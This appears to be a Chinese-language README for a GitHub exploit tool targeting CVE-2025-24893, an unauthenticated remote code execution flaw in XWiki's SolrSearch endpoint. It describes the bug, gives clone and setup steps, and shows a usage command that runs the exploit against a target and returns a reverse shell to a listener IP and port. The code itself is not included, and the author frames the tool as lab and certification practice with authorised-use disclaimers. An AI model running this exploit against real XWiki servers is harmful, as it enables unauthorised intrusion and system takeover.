vasilysaint/CVE-2025-24893

# CVE-2025-24893 XWiki Platform 是一个通用的 wiki 平台，为构建在其之上的应用程序提供运行时服务。由于 `SolrSearch` 端点存在漏洞，未经身份验证的用户可以实现任意的远程代码执行。此漏洞会影响整个 XWiki 安装的机密性、完整性和可用性。 **CVE：** CVE-2025-24893 ## 演示 漏洞利用的演示如下所示：  ## 用法 要使用此漏洞利用程序，请按照以下步骤操作： 1. 克隆仓库：`git clone https://github.com/yourusername/CVE-2025-24893.git` 2. 进入克隆的目录：`cd CVE-2025-24893` 3. 安装所需的依赖项：`pip install requests` 4. 运行漏洞利用程序： ``` ./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]] ``` ## 关于本漏洞利用程序 此漏洞利用程序演示了 CVE-2025-24893 中描述的远程代码执行漏洞，允许未经身份验证的用户在存在漏洞的基于 Linux 的 XWiki 安装上获取反弹 shell。 我最初开发此工具是用于 OSCP 准备实验室和 Hack The Box 等训练环境，因为我希望能有一种简单可靠的方法来复现该漏洞。由于当时没有任何现有工具能满足我的要求，我决定自己制作一个。 尽管 CVE-2025-24893 早已在受支持的 XWiki 版本中得到修复，但此漏洞利用程序仅应用于您拥有或明确授权测试的系统。 对于任何滥用此软件或因使用此软件而造成的任何损害，作者不承担任何责任。 ## 免责声明 此工具仅供教育目的和授权的安全评估使用。 仅对您拥有或明确授权测试的系统使用此工具。对于任何滥用此软件或因使用此软件而产生的任何损害，作者不承担任何法律责任。 ## 贡献 欢迎提交贡献。 如果您遇到 Bug、有改进建议，或希望增加对额外 payload、平台或功能的支持，请随时提交 issue 或发起 pull request。 非常感谢建设性的反馈、测试报告和代码贡献。

标签：CISA项目, Python, XWiki, 无后门, 编程工具, 远程代码执行, 逆向工具